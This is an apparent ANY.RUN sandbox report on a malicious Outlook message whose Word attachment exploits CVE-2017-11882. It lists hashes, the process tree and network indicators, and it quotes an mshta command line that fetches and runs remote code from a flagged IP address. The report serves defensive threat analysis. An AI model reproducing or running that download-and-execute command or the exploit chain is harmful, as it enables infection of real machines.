analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Administrator Notification_ Redirecting email with malware.msg

Full analysis: https://app.any.run/tasks/2329cdad-3d6a-4880-a14a-adc51de667f2
Verdict: Malicious activity
Analysis date: October 09, 2019, 13:05:25
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

0EFA49A6627F75AB47CE3187EC320760

SHA1:

7EA07F321D970558F3FFE5AED5B08131289E31CE

SHA256:

D5C9840979222286AD94DDA2F052F498AA536C60513191F9A186DEDF6CE10E83

SSDEEP:

3072:frcGXutin1rgwrrO6p/9fCKAvWkKpQ2LbPx9+gIJoWPc:H1cwnjOvWkKi2LN4Kh

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3124)
  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2792)
    • Executed via COM

      • OUTLOOK.EXE (PID: 2516)
      • EQNEDT32.EXE (PID: 3124)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2792)
    • Application launched itself

      • WINWORD.EXE (PID: 2336)
    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 2792)
      • WINWORD.EXE (PID: 2336)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 3124)
  • INFO

    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 2516)
      • OUTLOOK.EXE (PID: 2792)
      • WINWORD.EXE (PID: 2816)
      • WINWORD.EXE (PID: 2336)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2336)
    • Reads internet explorer settings

      • MsHTa.exe (PID: 3920)
    • Application was crashed

      • EQNEDT32.EXE (PID: 3124)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe outlook.exe no specs winword.exe no specs winword.exe no specs eqnedt32.exe mshta.exe

Process information

PID
CMD
Path
Indicators
Parent process
2792"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
2516"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\OUTLOOK.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Exit code:
0
Version:
14.0.6025.1000
2336"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2816"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3124"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3920MsHTa http://103.207.38.8:1010/hta &AAAAAAAA CC:\Windows\system32\MsHTa.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
Total events
3 368
Read events
2 540
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
27
Unknown types
5

Dropped files

PID
Process
Filename
Type
2792OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR4B8D.tmp.cvr
MD5:
SHA256:
2792OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF91A56A699FC54027.TMP
MD5:
SHA256:
2516OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRA805.tmp.cvr
MD5:
SHA256:
2792OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2336WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB795.tmp.cvr
MD5:
SHA256:
2336WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\1C05E995.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
2816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\msoC476.tmp
MD5:
SHA256:
2816WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_A8D2995A-41DE-4FEC-BD79-633D12301EDB.0\~WRS{8E647E7B-B2A1-4EF9-82FB-FEAB71EB8FC5}.tmp
MD5:
SHA256:
2792OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:085133BDF7ACA5C88C899D8859FE23AC
SHA256:AE9808F0B4ECBEFED1A284B36BA1F87F0C127C92B7D9F1C7523C33CA8F11EB12
2792OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\CW1FS8J4\Arrival Notice.doctext
MD5:FEEAB7C41B73D8F03B3D4D005A8B8BF3
SHA256:1AE650453A47CBF7872860245C7FEFF1DC7F82E9AFC0AE9D431B66CA6F324ADE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3920
MsHTa.exe
GET
103.207.38.8:1010
http://103.207.38.8:1010/hta
VN
malicious
2792
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3920
MsHTa.exe
103.207.38.8:1010
VNPT Corp
VN
malicious
2792
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted

Threats

PID
Process
Class
Message
3920
MsHTa.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
No debug info